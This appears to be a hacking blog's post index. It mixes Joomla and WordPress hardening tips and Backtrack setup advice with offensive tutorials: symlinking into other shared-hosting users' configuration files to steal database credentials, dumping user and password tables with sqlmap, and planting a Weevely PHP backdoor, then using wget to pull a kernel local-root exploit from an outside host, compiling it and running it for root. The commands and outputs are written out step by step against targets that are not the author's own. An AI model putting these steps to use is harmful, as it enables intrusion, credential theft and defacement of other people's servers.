Most Important Steps To Secure Joomla!

Hello guys, today I'm going to tell you most important steps to secure your Joomla! website. With those steps you can prevent almost 98% of the attacks!
Joomla! is one of the most popular webapps used on the internet, and from my point view only 5% of them are actually secured! xD
For hackers, when they see a joomla website on the server, they think it an easy target (It is an easy target if you didn't secure it!) and start attacking it!

So let's start with our steps! =)

1. Make Your Password Super hard!

Joomla! hashes are hard to crack, but not very hard though. So a hard password for Login brute-forcing cannot secure your hash from getting cracked if the attacker got an SQLi in your website.
what I will suggest is, making your password long, full of special characters, and full of numbers and letters. A hard password would be like this following:

W#W#W.S3cUr!tYg3Ek$.N3t|R0(k$s$z

You might be wondering, How in the hell would I remember this?! o_O
well easy, save it in you computer, mobile and somewhere else (In case you lost them) to use them when needed!
The above password would take forever to get cracked, usually hackers will target another site when the hash doesn't crack xD and still you can make it much longer, like copy that and paste it three times and use it as a password :D

2. Securing From Symlink

For those who don't know what symlink can do, If an attacker got access to the server, he can make a symbolic link to your configuration file, sign in to your database and then change your password!
what you have to do is change your configuration file permissions to 400 | HOW? Open your Cpanel and you can find the option to change the file permissions. OR you can change it using FTP using filezilla. another way (Most dangerous but best) is uploading a shell on your site, and changing the permissions from there! :)
How can I change with shell?
run this command in your Public_html directory:

chmod 400 configuration.php

3. Securing From Shell Upload

In Joomla, hackers upload the shell as in media section, after allowing PHP extension in global configuration. what we should do is, securing from shell upload even if they have access to the admin panel somehow.
chmod /images/ directory to 400 when you don't need to upload anything. that will make it not write-able for uploading even if .php is enabled.
disabled your FTP when you are not using it, and avoid opened FTP as much as possible. by doing those two things you will prevent many shell upload attempts by any attacker.

4. Scanning And Being Up-To-Date

Scan your website every time you install a plugin, and keep checking exploits Databases like 1337day and exploit-db to see if your joomla have any vulnerabilities or not.
after installing your joomla, scan it with JoomScan to see what vulnerabilities and patch them before you even launch your website.

4. Fast Tips/Tricks

# NEVER use the same password on two different things related to your website! for example your admin panel and FTP password, database password and FTP password and so on. even don't use the same password as your email or facebook!

# DO NOT use "admin" or "administrator" as your username in your website.

# Disable FTP when it's not needed.

# Try to change your admin password every once and a while!

# Check This Link to apply more security stuff!

Read More

How To Make 404 Page For Blogger (FULL 404 PAGE)

Hello guys, today I'm going to show you how to make a 404 page for your blogger blog! I found this way by my self because I really didn't like that 404 ERROR blogger give, and wanted to make a full 404 page like normal websites.

So here are the steps in the video bellow:

1. Make a new blog, call it whatever you want

2. Change to blogger old interface

3. Click on design of the new blog, then Edit Html (Design > Edit HTML)

4. Look at the bottom of the page, you will find "Revert To Classic Template" > Click on that

Now you will be able to change the whole code of the blog, with no errors! in other words fully deface it!

5. Paste your 404 page inside that blog, then save it.

6. Go to your Domain Name host and add that blog as 404.YourWebsite.COM (Note:- You can change to anything not 404.yourwebsite.com, but i thought 404.yourwebsite.com will look better)

7. Now go to Your main blog, click on Settings > Search Preferences 

8. You Will find custom 404 page there, click on "SET" and paste this code in it:

<script type="text/javascript"><!-- window.location = "http://404.securitygeeks.net" //--></script>

9. Change the link in the Code to your 404 page blog, to redirect the user to it.

Now whenever someone open a broken link, the blogger 404 error message will have this javascript will run and redirect him/her to the 404 page!

Now watch this video for more Understanding!

               

The code:
<script type="text/javascript"><!-- window.location = "http://404.securitygeeks.net" //--></script>

-----------------------------------------------------
UPDATED!
after Blogger removed the classic theme, the video above is not fully useful now. BUT, now here is the new way to FULLY change the blogger page (deface it) with the new theme.
1.Click on your blog, and then click on "Template"
2.Scroll down to the bottom of the page until you see something like this:

3. Click on "Revert to classic templates" and you will see something like this:

4. Now click on "Revert to classic template", and you're DONE!
now you will be able to change the main index :)

Enjoy =)

Read More

Hackers Wanted (2008) Full Documentary

This Video is actually one of the best videos I've ever watched. And, I think it's worth taking the time and watching it in full!

I saw this first on a forum (PakistaniSpot) and then someone sent me a link to it again in Hackers Media, so I thought it will be good to watch xD AND yes! I really enjoyed it!

one of the best videos I've watched in a while!

Hope you enjoy it too! =)

Read More

Most Important Steps To Secure Wordpress

Hello Guys, Today I'm going to tell you the most important steps to do to have a more secured Wordpress blog.

I think wordpress is the most used Webapps on cyber now; however, it's almost the easiest to be hacked and defaced!

But, on the other hand, securing your wordpress is so easy. specially on linux servers.

Note:- This tut will be based on linux commands, if you're a windows server user this tutorial is not completely for you!

so lets start with our steps!

1. Harder & Longer Password

Wordpress Hashes are so hard to crack (hardest for me xD) so making you password harder than "123456" , "admin" , "password" could help you ALOT!

The first thing a hacker would do is guess your password, if he failed he'll brute force it!

Hard password can save you from almost 50% of the attacks ! (In My Point of view )

When we say "hard password" it means using special characters like (@, () , [] , {} , ^ , % ,$ ,#,!,) and so on..

A longer password would not only secure you from Brute forcing, but even if you have a vulnerability like SQL injection for example and the attacker got a hash of your password (which is a Long and Full of special characters password) it would be hard as hell to crack it! and it will take them forever to crack it!

2. Securing From Symlink

Symlink is the most common way of hacking nowadays, and securing your website from it is will help you much!

For those who don't know what symlinking is can read my Symlink tutorial here. 

now to secure your blog from this kind of attack, you just have to change the permissions of you configuration file. You can do that though FTP, Cpanel, a shell, etc. 

just change the configuration file (wp-config.php in your case =) ) to 400

you can do that in a shell by running this command:

chmod 400 wp-config.php

and other ways are easy, just press on the option and change (in FTP and cpanel)

and always remember to remove your shell as soon as you finish working on it! xD 

Chmoding this file to 400, will not allow the attack to read your configuration file from another user! and that's about it :P

3. Securing From Defacing

If a hacker managed to get in your admin panel (somehow o.O) maybe through a Trojan on your PC or something you should close all the ways that let him upload a shell or deface your website!

What you can do it change the permission of all the pages (index.php, 404.php, footer.php, etc etc) in the theme to 400 (Example: chmod 400 page.php) or through your ftp or cpanel because if those files are writable there is a big change that the attacker change their source to a shell source code and deface you.

4. Vulnerability Discovering & Finding And Removing

Scan it every month just to check if any plugin have any vulnerability or something. that will make you faster than the hacker by discovering the vulnerability and patching it before someone else exploit it.

and second thing you want to do is being up-to-date with 133day.com and Wordpress forums they post any discovered vulnerability and sometimes its patches. This will help you to be less exploitable (I guess xD) 

5. Some Quick Tips

# NEVER EVER use the same password in two different things related to your website for example your Database's password and Cpanel's password, website's password and Database's password.

Always use different passwords

# Disable FTP when there is no use of it

# Don't use "admin" or "administrator" as your username

# Change Admin's Panel password every two weeks or so

# Read this article on Wordpress official website (Click Here) For more security

Following the above steps can prevent almost 98% of the attacks on your wordpress blog :)

Hope you liked it!

thanks for reading.

Read More

Symlink Tutorial

Hello Guys, Today I'm going to explain how to symlink websites in two different methods.
So Lets Start!

[#] Explanation
First I will explain what symlink can do, Symlinking is making Symbolic links to other websites on the same server to read their configuration files, connect to their database, and get the information needed to get access to their Control panel.
and that's about it :)



[#] Method #1

After uploading you shell on the server make a directory with the command bellow:

mkdir sym

NOTE:- The directory can be called whatever you want, just change the "sym" to any name.

Enter your new directory then upload OR create a file called ".htaccess" in the new directory with the code bellow inside it:

Options all
DirectoryIndex Sux.html
AddType text/plain .php
AddHandler server-parsed .php AddType text/plain .html
AddHandler txt .html
Require None
Satisfy Any

Like this picture:

After that, we will run the command bellow to create a symlink to "/" directory:

ln -s / root

and it will look like this:

And if we opened the directory "sym" from our browser like "www.website.com/sym"

it should look like this:

in the image above my shell was in /downloads so I made "sym" directory inside /downloads

and our process is almost done, now we just have to get the user of the target website.
I've provided user.php code in the bottom of the post, this script will give you all the websites on the server and their username.

when you get the username of your target, just open the link like this:

www.website.com/sym/root/home/(user)/public_html
where (user) = the user of the target
here is a picture for example:

where the user was "hillock"

now the next step is easy, we will start looking for the configuration its usually called config.php, or configuration.php.

here are the location of configuration files in the most famous webapps out there.

vBulletin -- /includes/config.php
IPB -- /conf_global.php
MyBB -- /inc/config.php
Phpbb -- /config.php
Php Nuke -- /config.php
Php-Fusion -- config.php
SMF -- /Settings.php
Joomla -- configuration.php , configuration.php-dist
WordPress -- /wp-config.php
Drupal -- /sites/default/settings.php
Oscommerce -- /includes/configure.php
e107 -- /e107_config.php
Seditio -- /datas/config.php

when you find the configuration file, it will contain the database details.
it will look like the image bellow (image bellow is joomla configuration file):

now upload SQL.php (code provided bellow)
and connect to the database.
Congrats :) now you can get all the details from admin table, and even change it.

[#] Method #2

In this method, we wont symlink the root directory, we will symlink the target's public_html dir directly.
To do this, just follow those steps,
1. Make the a new directory, just like method 1
2. make ".htaccess" OR upload it with the code bellow:

Options Indexes FollowSymlinks
DirectoryIndex z0mbie.htm
AddType txt .php
AddHandler txt .php

3. run the following comman:

ln -s /home/(user)/public_html (user)

where (user) = the target's user
and it will look like this when we open it in our browser:

in the picture the user name of my target was "csseipsn"
now you just have to find the configuration and connect :)

---

Scripts Needed:

User.php Source Code
SQL.php Source Code

FOR EDUCATIONAL PURPOSE ONLY!

Read More

How To Connect To A Server Via Weevely Backdoor

Hello Guys,
today I have another video for you on how to connect to a server via weevely!

weevely is a PHP backdoor.
and from this tutorial you can get better understanding about my R00ting with weevely Tutorial :)

so here is the video, hope you like it!

           

Best Played In Full Screen Mode!

Enjoy :)

Read More

Basic XSS understanding

Hello guys,
today I'm going to try to give you my basic understanding of XSS attacks.
there are two types of XSS attacks which are

1. None Persistent XSS

2. Persistent XSS



First, the None Persistent one is when you add your text like this:

www.website.com/search.php?search=Troll3d 

and the site shows something like:

"Search Result For Troll3d"


when we see that the text is displayed on the page with no validation 

then we try to put some HTML tags like:

www.website.co,/search.php?search=Tr0ll3d

or some Javascript like:

www.website.com/search.php?search=<script>alert("Tr0ll3d");</script>
If we got blinking text, or the java script ran successfully that means we can display anything we want, but that's not that dangerous for the website.

Second type is the Persistent XSS, this one is more dangerous which allow us to inject our codes in the website's source, with just little knowledge of Javascript you can even deface the website at extreme cases.
For the Persistent XSS, I found a perfect video from OWASP tutorials which I learned XSS from (Today after I got a request to make this tut xD )

Hope it was useful  for you guys :)
enjoy

Read More

Tips To Improve Backtrack

Hello everyone
as many people say "backtrack is hard to use" or "backtrack is not for daily use", but today I'm going to give you some tips to make backtrack perfect for your daily use, even KDE (which is harder to use than GNOME )



1. To make software installing much much easier and easier to search for a software Run this command:


apt-get install software-center

This command will install "Ubuntu Software Center" where you can search for software and install them with just one click


2. To install the best messengers in linux run this command:



apt-get install empathy && apt-get install pidgin

with those two you can connect and chat with yahoo, MSN, facebook, jabber (like nimbuzz, and mig33), and much more! and I would install them both and try to see which one is the best for my use.  but those two are my personal best xP



3. For screen Recording install XVidCap by running this command:


apt-get install xvidcap

This one has good quality I used it couple of times and liked it


4. TeamViwer, it can be downloaded from teamviewer.com.. and then installed with the following commands:


root@bt:~# cd Downloads

root@bt:~/Downloads# dpkg -i teamviewer_linux*.deb



5. For archive extraction (ALMOST ALL TYPES) install ARK but running this command:


apt-get install ark

I really like it, .rar, .zip, .tar, etc etc it can extract them !
you can also install "unrar" and "zip" by running the commands bellow:


apt-get install zip
apt-get install unrar



6. Installing VLC, which i failed in when i first used backtrack
but its the only player which can play .avi and .mpeg ... anyways
here is a video tutorial on how to install it and make it run as root (tut made by me xP)


How To Run VLC As Root



7. and now  google chrome my fav browser  which cant be opened as root  but here is a tut on how to fix this error and make it run as root and run smoothly


How To Run Google Chrome As Root

tut made by me as well xP



8. FTP client for linux, my personal best.. filezilla run the command bellow:


apt-get install filezilla



9. Now this one is for personal use  Offic package just like microsoft word and powerpoint.. but the open source version lol.. run the command bellow:


apt-get install openoffice.org

this command will install the whole package..



10. PDF reader, thats if it was not installed already run this command:


apt-get install xpdf



11. To install windows based programs "no all, just the most important" we will get "winetricks" which is now available in GUI version.. to make it read to use run these commands:


root@bt:~# wget http://winetricks.org/winetricks
root@bt:~# chmod +x winetricks

and then to use it just open the terminal and type:

root@bt:~# ./winetricks
(make sure that its in the same dir as you are by running the command "ls" to check if it was there)



12. to run VB .NET programs you have two options (do them both just to be sure )
installing "mono" by running this command:


apt-get install mono-complete
(mono is also used as for development not only running programs)
to run a program using mono type this:


mono PROGRAM-NAME.exe

(be sure to make the program executable using the following command:


chmod +x PROGRAM-NAME.exe

IF MONO DIDNT WORK, we have another option which is installing .NET framework using "winetricks"
open terminal, enter the dir that has winetricks and then run this command:


./winetricks corefonts dotnet20

after its done all you have to do is right click on the program you want and then choose "open with wine windows program loader" from the menu

now finally just update and upgrade your system by running this command:


apt-get update && apt-get upgrade && apt-get moo


that's it
enjoy using backtrack now :)

Read More

How To Run Google Chrome As Root In Linux

Hello guys :)
here is another video on how to run a program as root in linux, but this time it's Google Chrome (The best, and my fav :P )
It's a video tutorial as usual, hope you like it :)



          

Best Played At Full Screen!

Read More

How To Run Tor Browser As Root In Linux

Hello guys, today I'm going to show you how to run Tor browser as root in linux (backtrack in the video), I made this video because many people were asking how to get a VPN on backtrack, because most of them doesn't work, so here is a Tutorial on how to make Tor work in backtrack :)

         

             

Best Played At Full Screen Mode!

Read More

How to Run VLC player as Root On Linux

Hello Guys, today I'm going to show you how to fix VLC and run it as root in linux distros.

I made this video because I faced the same problem when I first switched to backtrack which always use root, so I found the way, and here it is in the video :P

               
Best PLayed At Full Screen Mode!

Read More

SQLmap Tutorial

Hello again guyz :)

today I'm going to show you how to hack SQL Vuln. site with SQLmap in BackTrack 5

first of all find a Vuln. site, or test our own sites by adding a single quote in the end of our link => '
and I assume that you have basic knowledge about SQL injection before reading this tutorial :P

second of all open BackTrack > Terminal; then type

cd /pentest/database/sqlmap

hit Enter.
Now we are inside SQLmap, lets start hacking :P

####################################################################



Now the command we will need here is:

+++++++++++++++++++++++++++++++++++++++++
-D         <= define the database
-T          <= define the table
-C          <= define the column
--dbs     <= bring DataBases names
--tables  <= bring table names
--columns <=bring columns names
--dump    <= dump the data out of the column
++++++++++++++++++++++++++++++++++++++++++

###################################################################



Lets start :)

our first command will be:

./sqlmap.py -u www.website.com/index.php?id=13 --dbs    <= Example!

 it will look like:

then we will get the Databases names like:

now we will ask for tables from any of those databases with --tables
now we have to select the database with "-D" and ask for the tables with "--tables" :)
so we will type:

./sqlmap.py -u www.website.com/index.php?id=13 -D database_name --tables

I choose walnut_live database so I typed:

 and the results will be the tables name of course :P
it will look like:

now we got the tables and found the users table!!
now we will select this table by "-T" command and ofcourse we already selected our database, so now we will write the same command, but we will replace "--tables" and put "-T" table_name which is "users" table and then ask for the columns inside that table by "--columns" command it will be like

./sqlmap.py -u www.website.com/index.php?id=13 -D database_name -T table_name --columns

it will look like:

 now we will get the results, the columns
they will come like this:

as you can see we got "id, pass, and user" columns
now we want the data from them so we will dump the data :P with "--dump"
but in this one we have two ways to get them..
we can dump all the data at once, Or select the column and get the data from
I will show you how both of them look like and used..

first we can get all the data by this command:

./sqlmap.py -u www.website.com/index.php?id=13 -D database_name -T table_name --dump

which will get us all the data at once and will look like this:

 and the result is:

In the picture I marked the user and pass :)
now we will try getting them one by one with this command:

./sqlmap.py -u www.website.com/index.php?id=13 -D database_name -T table_name -C column_name --dump

for example I will get user and pass:

User::

 result::

pass::

result::

######################################################################

we are done!!
we got the User, and Password :)
have fun

FOR EDUCATIONAL PURPOSE ONLY

Read More

Rooting A Server With Weevely

Hello again guyz,

today I'm going to show you how to R00t a server with Weevely in BackTrack.
First of all open Weevely:
Menu > BacTrack > Maintaining Access > Web Backdoors > Weevely
Or
Open Terminal and type:
root@root: cd /pentest/backdoor/web/weevely

############################################################



Now lets make our backdoor by typing:
root@root:./main.py -g -o /root/Desktop/backdoor.php -p password
 by typing this command, we made a backdoor called 'backdoor.php' with the password: 'password'

++++++++++++++++++++++Commands We Need++++++++++++++++++++++++++
-g  = Generate backdoor
-o  = Output
-p  = Password
-u  = URL
-t  = start Terminal session
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Steps:


Uploading our backdoor & connecting to it.
Checking the Kernel & Finding LocalR00t for it.
Compiling The LocalR00t
Executing..
###########################################################################
Lets start:


Open your shell and upload the backdoor:

The link to the backdoor will be the same as shell: For Example:
www.target.com/uploads/shell.php           <== shell
www.target.com/uploads/backdoor.php   <== backdoor

Connect to the backdoor by typing:
 ./main.py -t -u http://www.target.com/uploads/backdoor.php -p password

root@root:/pentest/backdoors/web/weevely# ./main.py -t -u http://www.target.com/backdoor.php -p password
  Weevely 0.3 - Generate and manage stealth PHP backdoors.
  Copyright (c) 2011-2012 Weevely Developers
  Website: http://code.google.com/p/weevely/

+ Using method 'system()'.
+ Retrieving terminal basic environment variables .

[hacker@target.com/]
Now to find the kernel version type:
uname -a
[hacker@target.com/] uname -a
2.6.18 (example)

 Now we have to find the localroot for that kernel in :
www.1337day.com
www.exploit-db.com
www.google.com
and some others..

Now, we go to the directory /tmp/, coz its always writeable,
now lets say the kernel was 2.6.18
there are some ways to get the localroot:
uploading through shell
wget method
curl
Now let me explain how each method works:

ofcourse you know how to upload though the shell :P

wget
wget www.exploit.com/2.6.18.c
curl
curl www.exploit.com/2.6.18.c -o new_name

for this TUT we will use WGET


############################################


[hacker@target.com/tmp/]ls
file
file1
anything
[hacker@target.com/tmp/]wget www.exploit.com/2.6.18.c
--2012-01-29 05:43:37--  http://1337day.com/exploits/17158
Resolving exploitcom... 127.1.1
Connecting to exploit.com|127.1.1|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: unspecified [text/html]
Saving to: `2.6.18.c'

     0K .........                                               208M=0s

2012-01-29 05:43:38 (208 MB/s) - `2.6.18.c' saved [9396]
 [hacker@target.com/tmp/]ls
 2.6.18.c
 file
 file1
 anything
#############################################
ok, now the exploit is on the server, we have to compile it by this command:
gcc 2.6.18.c -o zombie
[hacker@target.com/tmp/]gcc 2.6.18.c -o zombie


[hacker@target.com/tmp/]ls
 2.6.18.c
 file
 file1
 anything
 zombie

++++++++++++++++
chmod 777 zombie
++++++++++++++++
[hacker@target.com/tmp/]chmod 777 zombie

++++++++++++++++
executing..
++++++++++++++++

[hacker@target.com/tmp/]./zombie
.
.
.
.
.
done!
[hacker@target.com/tmp/]id
uid=(root) gid=(root)

R00ted!

FOR EDUCATIONAL PURPOSE ONLY

Read More